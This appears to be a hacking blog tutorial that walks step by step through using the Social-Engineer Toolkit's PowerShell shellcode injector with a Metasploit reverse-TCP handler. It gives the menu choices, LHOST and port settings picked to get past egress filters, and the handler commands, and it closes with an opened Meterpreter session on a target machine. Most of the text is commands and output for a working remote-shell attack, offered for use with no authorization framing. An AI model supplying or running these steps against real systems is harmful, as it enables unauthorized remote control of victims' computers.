PowerShell Attack Vectors

[LET'S MAKE IT WORK]

#1) Open terminal & type:
assault@hackbook:~$ sudo setoolkit

*From the SET menu, choose the options below one at a time, and read the output carefully after each keypress*
set> 1 = Social-Engineering Attacks
set> 9 = Powershell Attack Vectors
set:powershell> 1 = Powershell Alphanumeric Shellcode Injector
*Set your local host IP & the port number*
set:payloads> IP address for the payload listener (LHOST): 192.168.50.15
set:payloads> Enter the PORT for the reverse listener: 443
*Port 443 is the HTTPS port (HTTP over TLS/SSL). Listening there helps the callback get past egress filters that only allow web ports, but the windows/meterpreter/reverse_tcp stager used in this walkthrough is plain TCP, not TLS: a proxy or inspection device that expects a TLS handshake on 443 will still notice it. Use a reverse_https payload if you need real TLS on the wire.*
[*] Generating the payload.. please be patient.
[*] Payload has been exported to the default SET home directory (/root/.set/) folder 'autorun'
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the content of the folder to a CD/DVD/USB to autorun
*The autorun/template.pdf lines are what SET's Infectious Media Generator prints. The PowerShell injector instead writes the encoded PowerShell one-liner and the handler resource file under /root/.set/reports/powershell/ (the path the listener below reads from). That one-liner is what has to be executed on the target; the listener only waits for it.*
set> Create a listener right now [yes|no]: yes
*You will get this output*
[*] Launching Metasploit.. This could take a few. Be patient! Or else no shells for you…


Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready…
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED…..and…
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!

Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.15-dev                          ]
+ -- --=[ 1563 exploits - 904 auxiliary - 269 post         ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops              ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp  ]

[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 443
LPORT => 443
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:443
[*] Starting the payload handler...
*The handler is now waiting. Nothing happens until the exported PowerShell one-liner from /root/.set/reports/powershell/ is run on the target; when it is, the stager calls back and you get:*
msf exploit(handler) > [*] Sending stage (957487 bytes) to 192.168.50.7
[*] Meterpreter session 1 opened (192.168.50.15:443 -> 192.168.50.7:1375) at 2015-00-00 00:00:00 +0200
*Now hit Enter and type:*
msf exploit(handler) > sessions
*This lists the active sessions. Attach to session 1 with:*
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

ENJOY! 🙂


Here is an example by Gamer Forever